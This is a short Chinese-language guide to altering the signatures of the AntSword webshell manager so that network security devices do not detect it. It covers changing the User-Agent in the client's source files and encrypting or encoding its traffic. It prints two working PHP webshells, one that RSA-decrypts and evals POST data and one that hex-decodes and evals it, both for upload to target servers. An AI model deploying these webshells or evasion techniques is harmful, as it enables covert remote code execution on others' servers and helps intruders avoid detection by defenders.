蚁剑特征修改
简介
我们常常在测试过程中经常用到蚁剑,如果没有修改一些特征,会被一些流量设备轻易的发现,所以在这里写一下对蚁剑的一些特征进行修改
修改UA头
新版本蚁剑已经将UA头改为随机获取了,这里讲一下老版本的
首先在蚁剑中设置代理到burp
在burp的数据包中能清楚的看到蚁剑的特征
在目录/modules/request.js文件中修改UA头
/modules/update.js文件修改
修改完后,UA就变为我们自己想要的头了
流量加密
蚁剑支持rsa加密方式
直接使用自带的shell上传到目标服务器
<?php
$cmd = @$_POST['id'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCCVQo4Wjt9ZfRpZE4E+BBZ62E+
lWx178V16xzuYswqZuoCjo6Az9J/1wHySL73IQZgTZF5inPEfuW2Ep73aGSo0nLm
qckDmCuys7OSD+Ni2NjGzd5VQD2wP0he+TpcL7b0BJYEtdGqyGvuqZLECvtp8KTD
jukTOI/HBDUjCyhzhwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
链接前得新建一个ras的编码器,在链接shell的时候使用
链接的时候选择我们刚才新建的编码器
蚁剑链接shll后可看到请求包已被加密
除了使用自带的一些编码器之外,我们也可以直接写编码器,该github有一些编码器的分享
这里测试一下hex的编码,先添加一个hex的编码器
上传shell到服务器
<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>
链接时选择hex编码器
数据已被编码